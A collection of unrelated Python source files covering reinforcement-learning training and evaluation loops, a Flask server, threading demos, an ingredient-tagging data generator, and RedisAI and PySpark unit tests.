max_step = env.max_step
state_dim = env.state_dim
action_dim = env.action_dim
if_discrete = env.if_discrete
'''init: Agent, ReplayBuffer'''
agent.init(net_dim, state_dim, action_dim, if_per)
agent.state = env.reset()
if_on_policy = getattr(agent, 'if_on_policy', False)
buffer = ReplayBuffer(max_len=max_memo // rollout_num + max_step, if_on_policy=if_on_policy,
state_dim=state_dim, action_dim=1 if if_discrete else action_dim,
if_per=if_per, if_gpu=False)
'''start exploring'''
exp_step = target_step // rollout_num
with torch.no_grad():
if not if_on_policy:
explore_before_training(env, buffer, exp_step, reward_scale, gamma)
buffer.update_now_len_before_sample()
pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
# buf_state, buf_other = pipe1_exp.recv()
buffer.empty_buffer_before_explore()
while True:
agent.explore_env(env, buffer, exp_step, reward_scale, gamma)
buffer.update_now_len_before_sample()
pipe2_exp.send((buffer.buf_state[:buffer.now_len], buffer.buf_other[:buffer.now_len]))
# buf_state, buf_other = pipe1_exp.recv()
buffer.empty_buffer_before_explore()
# pipe1_exp.send(agent.act)
agent.act = pipe2_exp.recv()
def mp_evaluate(args, pipe2_eva):
args.init_before_training(if_main=True)
'''basic arguments'''
cwd = args.cwd
env = args.env
env_eval = env if args.env_eval is None else args.env_eval
agent_id = args.gpu_id
'''evaluating arguments'''
eval_gap = args.eval_gap
eval_times1 = args.eval_times1
eval_times2 = args.eval_times2
del args # In order to show these hyper-parameters clearly, I put them above.
'''init: Evaluator'''
evaluator = Evaluator(cwd=cwd, agent_id=agent_id, device=torch.device("cpu"), env=env_eval,
eval_gap=eval_gap, eval_times1=eval_times1, eval_times2=eval_times2, ) # build Evaluator
'''act_cpu without gradient for pipe1_eva'''
# pipe1_eva.send(agent.act)
act = pipe2_eva.recv()
act_cpu = deepcopy(act).to(torch.device("cpu")) # for pipe1_eva
[setattr(param, 'requires_grad', False) for param in act_cpu.parameters()]
'''start evaluating'''
with torch.no_grad(): # speed up running
act, steps, obj_a, obj_c = pipe2_eva.recv() # pipe2_eva (act, steps, obj_a, obj_c)
if_loop = True
while if_loop:
'''update actor'''
while not pipe2_eva.poll(): # wait until pipe2_eva not empty
time.sleep(1)
steps_sum = 0
while pipe2_eva.poll(): # receive the latest object from pipe
'''recv'''
# pipe1_eva.send((agent.act, steps, obj_a, obj_c))
# pipe1_eva.send('stop')
q_i_eva_get = pipe2_eva.recv()
if q_i_eva_get == 'stop':
if_loop = False
break
act, steps, obj_a, obj_c = q_i_eva_get
steps_sum += steps
act_cpu.load_state_dict(act.state_dict())
if_solve = evaluator.evaluate_save(act_cpu, steps_sum, obj_a, obj_c)
'''send'''
pipe2_eva.send(if_solve)
# if_solve = pipe1_eva.recv()
evaluator.draw_plot()
print(f'| SavedDir: {cwd}\n| UsedTime: {time.time() - evaluator.start_time:.0f}')
while pipe2_eva.poll(): # empty the pipe
pipe2_eva.recv()
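# Summary of the pipe protocol used by mp_train / mp_explore / mp_evaluate above
# (derived from the paired send/recv comments in those functions):
#   trainer   -> evaluator : agent.act, then repeated (act, steps, obj_a, obj_c), finally 'stop'
#   evaluator -> trainer   : if_solve flags read via pipe1_eva.recv()/poll()
#   trainer   -> explorer  : agent.act (the updated actor weights)
#   explorer  -> trainer   : (buf_state[:now_len], buf_other[:now_len]) transition batches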
'''utils'''
class Evaluator:
def __init__(self, cwd, agent_id, eval_times1, eval_times2, eval_gap, env, device):
self.recorder = [(0., -np.inf, 0., 0., 0.), ] # total_step, r_avg, r_std, obj_a, obj_c
self.r_max = -np.inf
self.total_step = 0
self.cwd = cwd # constant
self.device = device
self.agent_id = agent_id
self.eval_gap = eval_gap
self.eval_times1 = eval_times1
self.eval_times2 = eval_times2
self.env = env
self.target_return = env.target_return
self.used_time = None
self.start_time = time.time()
self.eval_time = -1  # an early time, so the first evaluation happens immediately
print(f"{'ID':>2} {'Step':>8} {'MaxR':>8} |"
f"{'avgR':>8} {'stdR':>8} {'objA':>8} {'objC':>8} |"
f"{'avgS':>6} {'stdS':>4}")
def evaluate_save(self, act, steps, obj_a, obj_c) -> bool:
self.total_step += steps # update total training steps
if time.time() - self.eval_time > self.eval_gap:
self.eval_time = time.time()
rewards_steps_list = [get_episode_return(self.env, act, self.device) for _ in range(self.eval_times1)]
r_avg, r_std, s_avg, s_std = self.get_r_avg_std_s_avg_std(rewards_steps_list)
if r_avg > self.r_max: # evaluate actor twice to save CPU Usage and keep precision
rewards_steps_list += [get_episode_return(self.env, act, self.device)
for _ in range(self.eval_times2 - self.eval_times1)]
r_avg, r_std, s_avg, s_std = self.get_r_avg_std_s_avg_std(rewards_steps_list)
if r_avg > self.r_max: # save checkpoint with highest episode return
self.r_max = r_avg # update max reward (episode return)
'''save actor.pth'''
act_save_path = f'{self.cwd}/actor.pth'
torch.save(act.state_dict(), act_save_path)
print(f"{self.agent_id:<2} {self.total_step:8.2e} {self.r_max:8.2f} |") # save policy and print
self.recorder.append((self.total_step, r_avg, r_std, obj_a, obj_c)) # update recorder
if_reach_goal = bool(self.r_max > self.target_return) # check if_reach_goal
if if_reach_goal and self.used_time is None:
self.used_time = int(time.time() - self.start_time)
print(f"{'ID':>2} {'Step':>8} {'TargetR':>8} |"
f"{'avgR':>8} {'stdR':>8} {'UsedTime':>8} ########\n"
f"{self.agent_id:<2} {self.total_step:8.2e} {self.target_return:8.2f} |"
f"{r_avg:8.2f} {r_std:8.2f} {self.used_time:>8} ########")
print(f"{self.agent_id:<2} {self.total_step:8.2e} {self.r_max:8.2f} |"
f"{r_avg:8.2f} {r_std:8.2f} {obj_a:8.2f} {obj_c:8.2f} |"
f"{s_avg:6.0f} {s_std:4.0f}")
else:
if_reach_goal = False
return if_reach_goal
def draw_plot(self):
if len(self.recorder) == 0:
print("| save_npy_draw_plot() WARNNING: len(self.recorder)==0")
return None
'''convert to array and save as npy'''
np.save('%s/recorder.npy' % self.cwd, self.recorder)
'''draw plot and save as png'''
train_time = int(time.time() - self.start_time)
total_step = int(self.recorder[-1][0])
save_title = f"plot_step_time_maxR_{int(total_step)}_{int(train_time)}_{self.r_max:.3f}"
save_learning_curve(self.recorder, self.cwd, save_title)
@staticmethod
def get_r_avg_std_s_avg_std(rewards_steps_list):
rewards_steps_ary = np.array(rewards_steps_list)
r_avg, s_avg = rewards_steps_ary.mean(axis=0) # average of episode return and episode step
r_std, s_std = rewards_steps_ary.std(axis=0) # standard dev. of episode return and episode step
return r_avg, r_std, s_avg, s_std
def get_episode_return(env, act, device) -> (float, int):
episode_return = 0.0 # sum of rewards in an episode
episode_step = 1
max_step = env.max_step
if_discrete = env.if_discrete
state = env.reset()
for episode_step in range(max_step):
s_tensor = torch.as_tensor((state,), device=device)
a_tensor = act(s_tensor)
if if_discrete:
a_tensor = a_tensor.argmax(dim=1)
action = a_tensor.cpu().numpy()[0]  # no need to detach(): this call happens inside torch.no_grad()
state, reward, done, _ = env.step(action)
episode_return += reward
if done:
break
episode_return = getattr(env, 'episode_return', episode_return)
return episode_return, episode_step + 1
def save_learning_curve(recorder, cwd='.', save_title='learning curve'):
recorder = np.array(recorder) # recorder_ary.append((self.total_step, r_avg, r_std, obj_a, obj_c))
steps = recorder[:, 0] # x-axis is training steps
r_avg = recorder[:, 1]
r_std = recorder[:, 2]
obj_a = recorder[:, 3]
obj_c = recorder[:, 4]
'''plot subplots'''
import matplotlib as mpl
mpl.use('Agg')
"""Generating matplotlib graphs without a running X server [duplicate]
write `mpl.use('Agg')` before `import matplotlib.pyplot as plt`
https://stackoverflow.com/a/4935945/9293137
"""
import matplotlib.pyplot as plt
fig, axs = plt.subplots(2)
axs0 = axs[0]
axs0.cla()
color0 = 'lightcoral'
axs0.set_xlabel('Total Steps')
axs0.set_ylabel('Episode Return')
axs0.plot(steps, r_avg, label='Episode Return', color=color0)
axs0.fill_between(steps, r_avg - r_std, r_avg + r_std, facecolor=color0, alpha=0.3)
ax11 = axs[1]
ax11.cla()
color11 = 'royalblue'
ax11.set_xlabel('Total Steps')
ax11.set_ylabel('objA', color=color11)
ax11.plot(steps, obj_a, label='objA', color=color11)
ax11.tick_params(axis='y', labelcolor=color11)
ax12 = axs[1].twinx()
color12 = 'darkcyan'
ax12.set_ylabel('objC', color=color12)
ax12.fill_between(steps, obj_c, facecolor=color12, alpha=0.2, )
ax12.tick_params(axis='y', labelcolor=color12)
'''plot save'''
plt.title(save_title, y=2.3)
plt.savefig(f"{cwd}/plot_learning_curve.jpg")
plt.close('all') # avoiding warning about too many open figures, rcParam `figure.max_open_warning`
# plt.show()  # when `mpl.use('Agg')` is used to draw figures without a GUI, plt.show() has no effect
def explore_before_training(env, buffer, target_step, reward_scale, gamma) -> int:
# only for off-policy algorithms; on-policy methods don't explore before training.
if_discrete = env.if_discrete
action_dim = env.action_dim
state = env.reset()
steps = 0
while steps < target_step:
action = rd.randint(action_dim) if if_discrete else rd.uniform(-1, 1, size=action_dim)
next_state, reward, done, _ = env.step(action)
steps += 1
scaled_reward = reward * reward_scale
mask = 0.0 if done else gamma
other = (scaled_reward, mask, action) if if_discrete else (scaled_reward, mask, *action)
buffer.append_buffer(state, other)
state = env.reset() if done else next_state
return steps
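# Minimal usage sketch (illustrative; not part of the original file). The agent
# class and the gym environment id below are placeholders -- substitute any
# ElegantRL agent that provides an `init` method:
#
#     from elegantrl.agent import AgentXXX  # hypothetical import path / agent name
#     args = Arguments(agent=AgentXXX(), env=PreprocessEnv(gym.make('Pendulum-v0')))
#     train_and_evaluate(args)       # single-process training
#     # train_and_evaluate_mp(args)  # or multi-process training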
|
server.py
|
from flask import Flask, render_template
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return render_template('index.html')
def run():
app.run(host='0.0.0.0', port=8080)
def server():
server = Thread(target=run)
server.start()
|
create_threads.py
|
#!/usr/bin/python
# This multithreading program creates five threads
# and each thread prints "Hello World" with a two-second interval
import threading
import time
def HelloWorld():
"""User defined Thread function"""
print("Hello World")
return
def Main():
threads = []  # keep references to the threads so they can be joined later
print("Program started. This program will print Hello World five times...")
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
time.sleep(2)
mythread.start()
print("Done! Program ended")
if __name__ == "__main__":
Main()
|
cli.py
|
from __future__ import print_function
import re
import decimal
import argparse
import pandas as pd
from multiprocessing import Pool, TimeoutError, Queue, Process, Manager
from Queue import Empty
import utils
class Cli(object):
def __init__(self, argv):
self.opts = self._parse_args(argv)
self._upstream_cursor = None
m = Manager()
self.output_queue = m.Queue()
def run(self):
self.generate_data(self.opts.count, self.opts.offset, self.opts.threads)
def generate_data(self, count, offset, threads):
"""
Generates training data in the CRF++ format for the ingredient
tagging task
"""
df = pd.read_csv(self.opts.data_path)
df = df.fillna("")
start = offset
end = offset + count
df_slice = df.iloc[start: end]
qr = Process(target=self.start_queue_reader)
qr.start()
worker_pool = Pool(processes=threads or None)
worker_pool.map_async(self._generate_data_worker, df_slice.iterrows())
worker_pool.close()
worker_pool.join()
self.output_queue.put('DONE')
qr.join()
def _generate_data_worker(self, args):
index, row = args
out = []
try:
# extract the display name
display_input = utils.cleanUnicodeFractions(row["input"])
tokens = utils.tokenize(display_input)
del(row["input"])
rowData = self.addPrefixes([(t, self.matchUp(t, row)) for t in tokens])
for i, (token, tags) in enumerate(rowData):
features = utils.getFeatures(token, i+1, tokens)
out.append(utils.joinLine([token] + features + [self.bestTag(tags)]))
# ToDo: deal with this
except UnicodeDecodeError:
pass
if out:
self.output_queue.put('\n'.join(out))
def start_queue_reader(self):
o = None
while o != 'DONE':
try:
o = self.output_queue.get()
if o != 'DONE':
print(o, end="\n\n", flush=True)
except Empty:
pass
def parseNumbers(self, s):
"""
Parses a string that represents a number into a decimal data type so that
we can match the quantity field in the db with the quantity that appears
in the display name. Rounds the result to 2 places.
"""
ss = utils.unclump(s)
m3 = re.match(r'^\d+$', ss)
if m3 is not None:
return decimal.Decimal(round(float(ss), 2))
m1 = re.match(r'(\d+)\s+(\d)/(\d)', ss)
if m1 is not None:
num = int(m1.group(1)) + (float(m1.group(2)) / float(m1.group(3)))
return decimal.Decimal(str(round(num,2)))
m2 = re.match(r'^(\d)/(\d)$', ss)
if m2 is not None:
num = float(m2.group(1)) / float(m2.group(2))
return decimal.Decimal(str(round(num,2)))
return None
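# Illustrative examples of the behaviour implied by the regexes above
# (assuming utils.unclump leaves these strings unchanged):
#   parseNumbers("4")      -> Decimal("4")     plain integer
#   parseNumbers("1 1/2")  -> Decimal("1.5")   mixed number: 1 + 1/2
#   parseNumbers("3/4")    -> Decimal("0.75")  simple fraction
#   parseNumbers("cup")    -> None             no numeric match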
def matchUp(self, token, ingredientRow):
"""
Returns our best guess of the match between the tags and the
words from the display text.
This problem is difficult for the following reasons:
* not all the words in the display name have associated tags
* the quantity field is stored as a number, but it appears
as a string in the display name
* the comment is often a compilation of different comments in
the display name
"""
ret = []
# strip parens from the token, since they often appear in the
# display_name, but are removed from the comment.
token = utils.normalizeToken(token)
decimalToken = self.parseNumbers(token)
for key, val in ingredientRow.iteritems():
if isinstance(val, basestring):
for n, vt in enumerate(utils.tokenize(val)):
if utils.normalizeToken(vt) == token:
ret.append(key.upper())
elif decimalToken is not None:
try:
if val == decimalToken:
ret.append(key.upper())
except Exception:
pass
return ret
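# Illustrative example (hypothetical row values): for the display text
# "3/4 cup sugar", the token "3/4" parses to Decimal("0.75") and matches a
# numeric qty column equal to 0.75, giving ["QTY"]; the token "cup" matches a
# string column token-for-token, giving that column's name in upper case; an
# unmatched token yields [].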
def addPrefixes(self, data):
"""
We use BIO tagging/chunking to differentiate between tags
at the start of a tag sequence and those in the middle. This
is a common technique in entity recognition.
Reference: http://www.kdd.cis.ksu.edu/Courses/Spring-2013/CIS798/Handouts/04-ramshaw95text.pdf
"""
prevTags = None
newData = []
for n, (token, tags) in enumerate(data):
newTags = []
for t in tags:
p = "B" if ((prevTags is None) or (t not in prevTags)) else "I"
newTags.append("%s-%s" % (p, t))
newData.append((token, newTags))
prevTags = tags
return newData
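# Illustrative example of the BIO prefixing (hypothetical tags): the input
#   [("1", ["QTY"]), ("1/2", ["QTY"]), ("cups", ["UNIT"]), ("flour", ["NAME"])]
# becomes
#   [("1", ["B-QTY"]), ("1/2", ["I-QTY"]), ("cups", ["B-UNIT"]), ("flour", ["B-NAME"])]
# i.e. the first token of each run of a tag gets a "B-" prefix, subsequent
# tokens of the same run get "I-".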
def bestTag(self, tags):
if len(tags) == 1:
return tags[0]
# if there are multiple tags, pick the first which isn't COMMENT
else:
for t in tags:
if (t != "B-COMMENT") and (t != "I-COMMENT"):
return t
# we have no idea what to guess
return "OTHER"
def _parse_args(self, argv):
"""
Parse the command-line arguments into a dict.
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--count", default=100, type=int, help=' ')
parser.add_argument("--offset", default=0, type=int, help=' ')
parser.add_argument("--threads", default=0, type=int, help=' ')
parser.add_argument("--data-path", default="nyt-ingredients-snapshot-2015.csv", help=' ')
return parser.parse_args(argv)
|
two-tasks.py
|
#!/usr/bin/env python
"""
Two progress bars that run in parallel.
"""
import threading
import time
from quo.progress import ProgressBar
def main():
with ProgressBar(title="Two tasks") as pb:
# Two parallel tasks.
def task_1():
for i in pb(range(100)):
time.sleep(0.05)
def task_2():
for i in pb(range(150)):
time.sleep(0.08)
# Start threads.
t1 = threading.Thread(target=task_1)
t2 = threading.Thread(target=task_2)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in [t1, t2]:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
|
tests_tflite.py
|
import numpy as np
from includes import *
'''
python -m RLTest --test tests_tflite.py --module path/to/redisai.so
'''
def test_run_tflite_model(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'TAG', 'asdf', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'asdf')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of TFLITE and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'TFLITE')
env.assertEqual(ret[3], b'CPU')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}')
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
env.assertEqual(values[0], 1)
def test_run_tflite_model_autobatch(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('lite-model_imagenet_mobilenet_v3_small_100_224_classification_5_default_1.tflite')
_, _, _, img = load_resnet_test_data()
img = img.astype(np.float32) / 255
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU',
'BATCHSIZE', 4, 'MINBATCHSIZE', 2,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
if DEVICE == "CPU":
env.assertEqual(ret[1], b'TFLITE')
env.assertEqual(ret[3], b'CPU')
ret = con.execute_command('AI.TENSORSET', 'a{1}',
'FLOAT', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'b{1}',
'FLOAT', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
def run():
con = get_connection(env, '{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1,
'b{1}', 'OUTPUTS', 1, 'd{1}')
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'c{1}')
t.join()
ensureSlaveSynced(con, env)
c_values = np.array(con.execute_command('AI.TENSORGET', 'c{1}', 'VALUES'), dtype=np.float32)
c_idx = np.argmax(c_values)
d_values = np.array(con.execute_command('AI.TENSORGET', 'd{1}', 'VALUES'), dtype=np.float32)
d_idx = np.argmax(d_values)
env.assertEqual(c_idx, d_idx)
env.assertFalse(np.isnan(c_values[c_idx]))
env.assertFalse(np.isinf(c_values[c_idx]))
def test_run_tflite_errors(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
wrong_model_pb = load_file_content('graph.pb')
ret = con.execute_command('AI.MODELSTORE', 'm_2{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
check_error_message(env, con, "Failed to load model from buffer",
'AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'TAG', 'asdf', 'BLOB', wrong_model_pb)
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
check_error_message(env, con, "Number of keys given as OUTPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm_2{1}', 'INPUTS', 1, 'EMPTY_INPUT{1}', 'OUTPUTS', 1, 'EMPTY_OUTPUT{1}')
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm_2{1}', 'INPUTS', 3, 'a{1}', 'b{1}', 'c{1}', 'OUTPUTS', 1, 'd{1}')
model_pb = load_file_content('lite-model_imagenet_mobilenet_v3_small_100_224_classification_5_default_1.tflite')
_, _, _, img = load_resnet_test_data()
ret = con.execute_command('AI.MODELSTORE', 'image_net{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'dog{1}', 'UINT8', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
# The model expects FLOAT input, but UINT8 tensor is given.
check_error_message(env, con, "Input tensor type doesn't match the type expected by the model definition",
'AI.MODELEXECUTE', 'image_net{1}', 'INPUTS', 1, 'dog{1}', 'OUTPUTS', 1, 'output{1}')
def test_tflite_modelinfo(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
if DEVICE == "GPU":
env.debugPrint("skipping {} since it's hanging CI".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
previous_duration = 0
for call in range(1, 10):
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}')
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
info = con.execute_command('AI.INFO', 'mnist{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['key'], 'mnist{1}')
env.assertEqual(info_dict_0['type'], 'MODEL')
env.assertEqual(info_dict_0['backend'], 'TFLITE')
env.assertEqual(info_dict_0['device'], DEVICE)
env.assertTrue(info_dict_0['duration'] > previous_duration)
env.assertEqual(info_dict_0['samples'], call)
env.assertEqual(info_dict_0['calls'], call)
env.assertEqual(info_dict_0['errors'], 0)
previous_duration = info_dict_0['duration']
res = con.execute_command('AI.INFO', 'mnist{1}', 'RESETSTAT')
env.assertEqual(res, b'OK')
info = con.execute_command('AI.INFO', 'mnist{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['duration'], 0)
env.assertEqual(info_dict_0['samples'], 0)
env.assertEqual(info_dict_0['calls'], 0)
env.assertEqual(info_dict_0['errors'], 0)
def test_tflite_modelrun_disconnect(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = send_and_disconnect(('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}'), con)
env.assertEqual(ret, None)
def test_tflite_model_rdb_save_load(env):
env.skipOnCluster()
if env.useAof or not TEST_TFLITE:
env.debugPrint("skipping {}".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
model_serialized_memory = con.execute_command('AI.MODELGET', 'mnist{1}', 'BLOB')
ensureSlaveSynced(con, env)
ret = con.execute_command('SAVE')
env.assertEqual(ret, True)
env.stop()
env.start()
con = get_connection(env, '{1}')
model_serialized_after_rdbload = con.execute_command('AI.MODELGET', 'mnist{1}', 'BLOB')
env.assertEqual(len(model_serialized_memory), len(model_serialized_after_rdbload))
env.assertEqual(len(model_pb), len(model_serialized_after_rdbload))
# Assert in memory model binary is equal to loaded model binary
env.assertTrue(model_serialized_memory == model_serialized_after_rdbload)
# Assert input model binary is equal to loaded model binary
env.assertTrue(model_pb == model_serialized_after_rdbload)
def test_tflite_info(env):
if not TEST_TFLITE:
env.debugPrint("skipping {}".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
backends_info = get_info_section(con, 'backends_info')
env.assertFalse('ai_TensorFlowLite_version' in backends_info)
model_pb = load_file_content('mnist_model_quant.tflite')
con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
backends_info = get_info_section(con, 'backends_info')
env.assertTrue('ai_TensorFlowLite_version' in backends_info)
|
test_pin_thread.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import threading
import unittest
from pyspark import SparkContext, SparkConf, InheritableThread
class PinThreadTests(unittest.TestCase):
# These tests are in a separate class because it uses
# 'PYSPARK_PIN_THREAD' environment variable to test thread pin feature.
@classmethod
def setUpClass(cls):
cls.old_pin_thread = os.environ.get("PYSPARK_PIN_THREAD")
os.environ["PYSPARK_PIN_THREAD"] = "true"
cls.sc = SparkContext('local[4]', cls.__name__, conf=SparkConf())
@classmethod
def tearDownClass(cls):
cls.sc.stop()
if cls.old_pin_thread is not None:
os.environ["PYSPARK_PIN_THREAD"] = cls.old_pin_thread
else:
del os.environ["PYSPARK_PIN_THREAD"]
def test_pinned_thread(self):
threads = []
exceptions = []
property_name = "test_property_%s" % PinThreadTests.__name__
jvm_thread_ids = []
for i in range(10):
def test_local_property():
jvm_thread_id = self.sc._jvm.java.lang.Thread.currentThread().getId()
jvm_thread_ids.append(jvm_thread_id)
# If a property is set in this thread, later it should get the same property
# within this thread.
self.sc.setLocalProperty(property_name, str(i))
# 5 threads, 1 second sleep. 5 threads without a sleep.
time.sleep(i % 2)
try:
assert self.sc.getLocalProperty(property_name) == str(i)
# Each command might create a thread in multi-threading mode in Py4J.
# This assert makes sure that the created thread is being reused.
assert jvm_thread_id == self.sc._jvm.java.lang.Thread.currentThread().getId()
except Exception as e:
exceptions.append(e)
threads.append(threading.Thread(target=test_local_property))
for t in threads:
t.start()
for t in threads:
t.join()
for e in exceptions:
raise e
# 10 JVM threads should have been created because there are 10 Python threads.
assert len(set(jvm_thread_ids)) == 10
def test_multiple_group_jobs(self):
# SPARK-22340: add a mode to pin the Python thread to the JVM thread.
group_a = "job_ids_to_cancel"
group_b = "job_ids_to_run"
threads = []
thread_ids = range(4)
thread_ids_to_cancel = [i for i in thread_ids if i % 2 == 0]
thread_ids_to_run = [i for i in thread_ids if i % 2 != 0]
# A list which records whether job is cancelled.
# The index of the array is the thread index which job run in.
is_job_cancelled = [False for _ in thread_ids]
def run_job(job_group, index):
"""
Executes a job in the group ``job_group``. Each job sleeps for 15 seconds,
long enough for it to be cancelled before it finishes.
"""
try:
self.sc.setJobGroup(job_group, "test rdd collect with setting job group")
self.sc.parallelize([15]).map(lambda x: time.sleep(x)).collect()
is_job_cancelled[index] = False
except Exception:
# Assume that exception means job cancellation.
is_job_cancelled[index] = True
# Test if job succeeded when not cancelled.
run_job(group_a, 0)
self.assertFalse(is_job_cancelled[0])
# Run jobs
for i in thread_ids_to_cancel:
t = threading.Thread(target=run_job, args=(group_a, i))
t.start()
threads.append(t)
for i in thread_ids_to_run:
t = threading.Thread(target=run_job, args=(group_b, i))
t.start()
threads.append(t)
# Wait to make sure all jobs are executed.
time.sleep(3)
# And then, cancel one job group.
self.sc.cancelJobGroup(group_a)
# Wait until all threads launching jobs are finished.
for t in threads:
t.join()
for i in thread_ids_to_cancel:
self.assertTrue(
is_job_cancelled[i],
"Thread {i}: Job in group A was not cancelled.".format(i=i))
for i in thread_ids_to_run:
self.assertFalse(
is_job_cancelled[i],
"Thread {i}: Job in group B did not succeeded.".format(i=i))
def test_inheritable_local_property(self):
self.sc.setLocalProperty("a", "hi")
expected = []
def get_inner_local_prop():
expected.append(self.sc.getLocalProperty("b"))
def get_outer_local_prop():
expected.append(self.sc.getLocalProperty("a"))
self.sc.setLocalProperty("b", "hello")
t2 = InheritableThread(target=get_inner_local_prop)
t2.start()
t2.join()
t1 = InheritableThread(target=get_outer_local_prop)
t1.start()
t1.join()
self.assertEqual(self.sc.getLocalProperty("b"), None)
self.assertEqual(expected, ["hi", "hello"])
if __name__ == "__main__":
import unittest
from pyspark.tests.test_pin_thread import * # noqa: F401
try:
import xmlrunner
